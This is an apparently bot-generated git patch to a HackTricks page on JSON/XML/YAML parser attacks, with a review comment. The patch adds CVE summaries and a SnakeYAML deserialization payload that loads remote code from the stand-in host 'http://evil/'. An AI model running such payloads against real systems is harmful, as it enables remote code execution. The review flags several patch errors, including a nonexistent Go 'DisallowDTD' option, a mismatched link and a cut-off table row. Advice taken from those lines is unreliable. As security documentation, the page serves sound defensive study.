From ebd4800ae182ef35b40f796b19bb0e5f644494d5 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Fri, 1 Aug 2025 01:53:55 +0000 Subject: [PATCH] Add content from: Research Update: Enhanced src/pentesting-web/json-xml-yaml-h... --- src/pentesting-web/json-xml-yaml-hacking.md | 53 +++++++++++++++++---- 1 file changed, 45 insertions(+), 8 deletions(-) diff --git a/src/pentesting-web/json-xml-yaml-hacking.md b/src/pentesting-web/json-xml-yaml-hacking.md index 7b268093e..f601f2b62 100644 --- a/src/pentesting-web/json-xml-yaml-hacking.md +++ b/src/pentesting-web/json-xml-yaml-hacking.md 
@@ -128,16 +128,53 @@ Result: - **YAML** parser: `Action_1` (case-sensitive) - **XML** parser: parses `"Action_3"` inside the string +--- -### 🔐 Mitigations +## Notable Parser Vulnerabilities (2023-2025) -| Risk | Fix | -|-----------------------------|---------------------------------------| -| Unknown fields | `decoder.DisallowUnknownFields()` | -| Duplicate fields (JSON) | ❌ No fix in stdlib | -| Case-insensitive match | ❌ No fix in stdlib | -| XML garbage data | ❌ No fix in stdlib | -| YAML: unknown keys | `yaml.KnownFields(true)` | +> The following publicly-exploitable issues show that insecure parsing is a multi-language problem — not just a Go problem. +### SnakeYAML Deserialization RCE (CVE-2022-1471) + +* Affects: `org.yaml:snakeyaml` < **2.0** (used by Spring-Boot, Jenkins, etc.). +* Root cause: `new Constructor()` deserializes **arbitrary Java classes**, allowing gadget chains that culminate in remote-code execution. +* One-liner PoC (will open the calculator on vulnerable host): +```yaml +!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://evil/"] ] ] ] +``` +* Fix / Mitigation: + 1. **Upgrade to ≥2.0** (uses `SafeLoader` by default). + 2. On older versions, explicitly use `new Yaml(new SafeConstructor())`. + +### libyaml Double-Free (CVE-2024-35325) + +* Affects: `libyaml` ≤0.2.5 (C library leveraged by many language bindings). +* Issue: Calling `yaml_event_delete()` twice leads to a double-free that attackers can turn into DoS or, in some scenarios, heap exploitation. +* Status: Upstream rejected as “API misuse”, but Linux distributions shipped patched **0.2.6** that null-frees the pointer defensively. + +### RapidJSON Integer (Under|Over)-flow (CVE-2024-38517 / CVE-2024-39684) + +* Affects: Tencent **RapidJSON** before commit `8269bc2` (<1.1.0-patch-22). 
+* Bug: In `GenericReader::ParseNumber()` unchecked arithmetic lets attackers craft huge numeric literals that wrap around and corrupt the heap — ultimately enabling privilege-escalation when the resulting object graph is used for authorization decisions. + +--- + +### 🔐 Mitigations (Updated) + +| Risk | Fix / Recommendation | +|-------------------------------------|------------------------------------------------------------| +| Unknown fields (JSON) | `decoder.DisallowUnknownFields()` | +| Duplicate fields (JSON) | ❌ No fix in stdlib — validate with [`jsoncheck`](https://github.com/dvsekhvalnov/johnny-five) | +| Case-insensitive match (Go) | ❌ No fix — validate struct tags + pre-canonicalize input | +| XML garbage data / XXE | Use a hardened parser (`encoding/xml` + `DisallowDTD`) | +| YAML unknown keys | `yaml.KnownFields(true)` | +| **Unsafe YAML deserialization** | Use SafeConstructor / upgrade to SnakeYAML ≥2.0 | +| libyaml ≤0.2.5 double-free | Upgrade to **0.2.6** or distro-patched release | +| RapidJSON
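Review bot: The XML row of the updated Mitigations table recommends "`encoding/xml` + `DisallowDTD`", but Go's standard `encoding/xml` package has no `DisallowDTD` option (the `Decoder` exposes `Strict`, `Entity`, `CharsetReader`, `AutoClose` and `DefaultSpace`), so the advice cannot be followed as written; either name a real hardening step, or state that `encoding/xml` does not resolve external entities and point readers to a parser that offers explicit DTD controls. Related problems in the same table and section: the "Duplicate fields (JSON)" row links the text `jsoncheck` to `https://github.com/dvsekhvalnov/johnny-five`, a repository whose name does not match the tool, so the link needs verifying before merge; the new section is titled "Notable Parser Vulnerabilities (2023-2025)" yet its first entry is CVE-2022-1471, so the date range or the entry should be adjusted; the section is introduced as `##` while the neighbouring headings (for example `### 🔐 Mitigations (Updated)`) are `###`, which changes the page hierarchy; and the final table row, `| RapidJSON`, is cut off mid-row, so the hunk should be checked for completeness and the row finished (presumably with the patched version from the RapidJSON entry above) before this is merged.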